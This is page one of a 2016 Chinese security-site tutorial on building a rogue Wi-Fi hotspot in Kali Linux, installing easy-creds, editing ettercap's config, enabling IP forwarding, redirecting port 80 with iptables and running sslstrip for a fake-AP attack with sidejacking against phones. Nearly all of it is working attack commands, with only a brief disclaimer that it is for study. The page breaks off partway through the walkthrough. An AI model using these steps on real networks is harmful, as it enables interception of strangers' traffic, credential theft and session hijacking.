欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

揭秘:攻击者如何在Kali Linux中搭建钓鱼热点

来源:本站整理 作者:佚名 时间:2016-07-21 TAG: 我要投稿

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
0×00 实验环境
操作系统:Kali 1.0 (VM)
FackAP: easy-creds
硬件:NETGEAR wg111 v3 RTL8187B 网卡(kali下免驱)

靶机:安卓、iPhone设备
0×01 环境搭建
git clone https://github.com/brav0hax/easy-creds
cd easy-creds

 
bash install.sh

 
选择第一项:1.  Debian/Ubuntu and derivatives

这一步设定easy-creds的安装目录:/opt ,安装过程中会从国外网站下载一些依赖包以及第三方软件,这一过程中建议通过翻墙来节省时间。
当看到提示happy hunting的时候便意味着安装完成了:

 
0×02
根据上述步骤已将easy-creds安装到Kali中,我们可以在终端执行easy-creds运行,接下来我们需要对软件、系统参数进行一些修改:
2.1 修改etter uid、gid值 &开启iptables端口转发
kali中自带了中间人攻击的一些工具,如:ettercap,在第一次使用ettercap时,我们需要修改其默认配置文件/etc/ettercap/etter.conf: (有的系统中,ettercap的配置文件路径为:/etc/etter.conf)

需要我们把ettercap的ec_uid、ec_gid的值修改为0:以系统最高权限运行。

另外,如果系统使用了iptables防火墙,还需取消#后的注释使iptables配置生效,将:
# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
修改为:
# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
2.2 开启ipv4数据包转发:
echo 1 >> /proc/sys/net/ipv4/ip_forward
2.3 配置iptables规则:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2.4 运行sslstrip
sslstrip -l 8080
2.5 开启网络管理 &重启网络管理服务
vim /etc/NetworkManager/NetworkManager.conf

将managed=false修改为managed=true:

重启网络管理服务:
service network-manager restart
0×03 运行easy-creds
终端执行:easy-creds   
选择第三项:FakeAP Attacks

 
选择第一项:FakeAP Attack Static

 
y确定包含sidejacking劫持攻击:

 
下一步选择WIFI网络的流量入口:eth0

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载